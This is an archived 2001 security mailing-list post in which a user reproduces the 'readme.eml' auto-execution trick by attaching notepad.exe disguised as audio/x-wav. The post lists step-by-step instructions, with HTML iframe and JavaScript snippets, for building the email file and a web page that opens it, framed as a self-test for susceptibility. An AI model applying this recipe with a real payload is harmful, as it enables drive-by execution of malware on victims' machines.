Hello- I became concerned with this after I read someone had actually executed the code by visiting a web site. (my servers are patched, so I'm not worried about that) I have duplicated the readme.eml message, only using notepad.exe instead. If I use an actual .wav file, readme.eml is opened from the web page and the wav file opens and plays in media player. If I use notepad.exe (Content-Type: audio/x-wav), I am prompted as to whether I would like to download or not. If I select run from current location, it runs notepad. This is the behavior I would like, so no malicious code runs without me knowing. However, I am using Media Player 6.4, so I don't know if it makes a difference. To create your own readme.eml to test if you are susceptible, follow these steps: 1. Create a dummy message in OE. You don't have to address it to anyone. 2. Attache notepad.exe. 3. Save as readme.eml 4. Edit the readme.eml with notepad. Find the html body and replace with: <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> 5. Find the notepad.exe attachment section. Change Content-Type to audio/x-wav 6. (necessary?) Remove Content-Disposition: attachment;filename="NOTEPAD.EXE" header. 7. Add the following header: Content-ID: <EA4DMGBP9p> This is apparently to link the iframe <src> tag. 8. Save the file. 9. Create a web page that includes the code: <script language="JavaScript"> window.open("readme.eml", null, "resizable=yes,top=0,left=0") </script> make sure readme.eml is in the same directory. 10. Open the web page as see what happens. Like I said, I was prompted. I hope you are too because this would be very serious if it could be spread *that* easy. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 15:24:54 PDT